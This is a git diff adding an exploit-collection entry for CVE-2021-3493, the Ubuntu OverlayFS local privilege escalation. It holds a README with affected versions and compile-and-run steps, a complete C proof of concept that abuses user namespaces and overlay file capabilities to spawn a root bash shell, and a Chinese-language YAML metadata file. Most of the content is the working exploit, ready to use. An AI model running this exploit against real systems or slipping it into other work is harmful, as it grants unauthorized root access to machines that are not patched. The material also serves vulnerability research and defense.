diff --git a/cve/linux-kernel/2021/CVE-2021-3493/README.md b/cve/linux-kernel/2021/CVE-2021-3493/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..f69a385715330f9ab103c4ee36306e0641f9e5a4
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-3493/README.md
@@ -0,0 +1,31 @@
+# CVE-2021-3493
+Ubuntu OverlayFS Local Privesc
+
+## Affected Versions
+
+- Ubuntu 20.10
+- Ubuntu 20.04 LTS
+- Ubuntu 18.04 LTS
+- Ubuntu 16.04 LTS
+- Ubuntu 14.04 ESM
+
+## Usage
+
+- ```gcc exploit.c -o exploit```
+- ```chmod +x exploit```
+- ```./exploit```
+
+## Description
+
+"Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces. A local attacker could use this to gain elevated privileges, due to a patch carried in Ubuntu to allow unprivileged overlayfs mounts." [- Ubuntu Security](https://ubuntu.com/security/CVE-2021-3493)
+
+Fixed in Linux 5.11
+
+## References
+- https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/
+- https://ubuntu.com/security/CVE-2021-3493
+- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7c03e2cda4a584cadc398e8f6641ca9988a39d52
+- https://www.openwall.com/lists/oss-security/2021/04/16/1
+
+## Disclaimer
+I am not the author of this exploit. I have not made any modifications to the PoC found here: https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/.
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/CVE-2021-3493/exploit.c b/cve/linux-kernel/2021/CVE-2021-3493/exploit.c
new file mode 100644
index 0000000000000000000000000000000000000000..ae44269e40fc51cb95df2a4971ab9b84d703f7c3
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-3493/exploit.c
@@ -0,0 +1,147 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <err.h>
+#include <errno.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/mount.h>
+
+//#include <attr/xattr.h>
+//#include <sys/xattr.h>
+int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
+
+
+#define DIR_BASE    "./ovlcap"
+#define DIR_WORK    DIR_BASE "/work"
+#define DIR_LOWER   DIR_BASE "/lower"
+#define DIR_UPPER   DIR_BASE "/upper"
+#define DIR_MERGE   DIR_BASE "/merge"
+#define BIN_MERGE   DIR_MERGE "/magic"
+#define BIN_UPPER   DIR_UPPER "/magic"
+
+
+static void xmkdir(const char *path, mode_t mode)
+{
+    if (mkdir(path, mode) == -1 && errno != EEXIST)
+        err(1, "mkdir %s", path);
+}
+
+static void xwritefile(const char *path, const char *data)
+{
+    int fd = open(path, O_WRONLY);
+    if (fd == -1)
+        err(1, "open %s", path);
+    ssize_t len = (ssize_t) strlen(data);
+    if (write(fd, data, len) != len)
+        err(1, "write %s", path);
+    close(fd);
+}
+
+static void xcopyfile(const char *src, const char *dst, mode_t mode)
+{
+    int fi, fo;
+
+    if ((fi = open(src, O_RDONLY)) == -1)
+        err(1, "open %s", src);
+    if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
+        err(1, "open %s", dst);
+
+    char buf[4096];
+    ssize_t rd, wr;
+
+    for (;;) {
+        rd = read(fi, buf, sizeof(buf));
+        if (rd == 0) {
+            break;
+        } else if (rd == -1) {
+            if (errno == EINTR)
+                continue;
+            err(1, "read %s", src);
+        }
+
+        char *p = buf;
+        while (rd > 0) {
+            wr = write(fo, p, rd);
+            if (wr == -1) {
+                if (errno == EINTR)
+                    continue;
+                err(1, "write %s", dst);
+            }
+            p += wr;
+            rd -= wr;
+        }
+    }
+
+    close(fi);
+    close(fo);
+}
+
+static int exploit()
+{
+    char buf[4096];
+
+    sprintf(buf, "rm -rf '%s/'", DIR_BASE);
+    system(buf);
+
+    xmkdir(DIR_BASE, 0777);
+    xmkdir(DIR_WORK,  0777);
+    xmkdir(DIR_LOWER, 0777);
+    xmkdir(DIR_UPPER, 0777);
+    xmkdir(DIR_MERGE, 0777);
+
+    uid_t uid = getuid();
+    gid_t gid = getgid();
+
+    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
+        err(1, "unshare");
+
+    xwritefile("/proc/self/setgroups", "deny");
+
+    sprintf(buf, "0 %d 1", uid);
+    xwritefile("/proc/self/uid_map", buf);
+
+    sprintf(buf, "0 %d 1", gid);
+    xwritefile("/proc/self/gid_map", buf);
+
+    sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
+    if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
+        err(1, "mount %s", DIR_MERGE);
+
+    // all+ep
+    char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";
+
+    xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
+    if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
+        err(1, "setxattr %s", BIN_MERGE);
+
+    return 0;
+}
+
+int main(int argc, char *argv[])
+{
+    if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {
+        setuid(0);
+        setgid(0);
+        execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
+        err(1, "execl /bin/bash");
+    }
+
+    pid_t child = fork();
+    if (child == -1)
+        err(1, "fork");
+
+    if (child == 0) {
+        _exit(exploit());
+    } else {
+        waitpid(child, NULL, 0);
+    }
+
+    execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
+    err(1, "execl %s", BIN_UPPER);
+}
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..ade74c393fc1cc591e6941b4aa727e4697294643
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-3493
+source: https://github.com/Al1ex/LinuxEelvation/blob/master/CVE-2021-3493
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    Linux内核中overlayfs文件系统中的Ubuntu特定问题，在Ubuntu中没有正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu带有一个支持非特权的overlayfs挂载的补丁，因此本地攻击者可以使用它来进行提权操作，因此该漏洞对Linux的其他发行版没有影响。
+  scope-of-influence:
+    Ubuntu 20.10
+    Ubuntu 20.04 LTS
+    Ubuntu 18.04 LTS
+    Ubuntu 16.04 LTS
+    Ubuntu 14.04 ESM
+    （Linux-kernel < 5.11）
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3493
+    - https://ubuntu.com/security/notices/USN-4917-1
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-3493
+    cwe-id: CWE-269, CEW-270
+  tags: cve2021,权限提升
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 54fe63098128b49cae181b27da96d1bed8a3667c..541b0d7cd8556e0405b54fb28f0ac392e9ef2348 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -2,6 +2,7 @@
 cve: 
   linux-kernel:
     - CVE-2021-33909
+    - CVE-2021-3493
     - CVE-2022-0995
     - CVE-2022-1015
     - CVE-2022-2602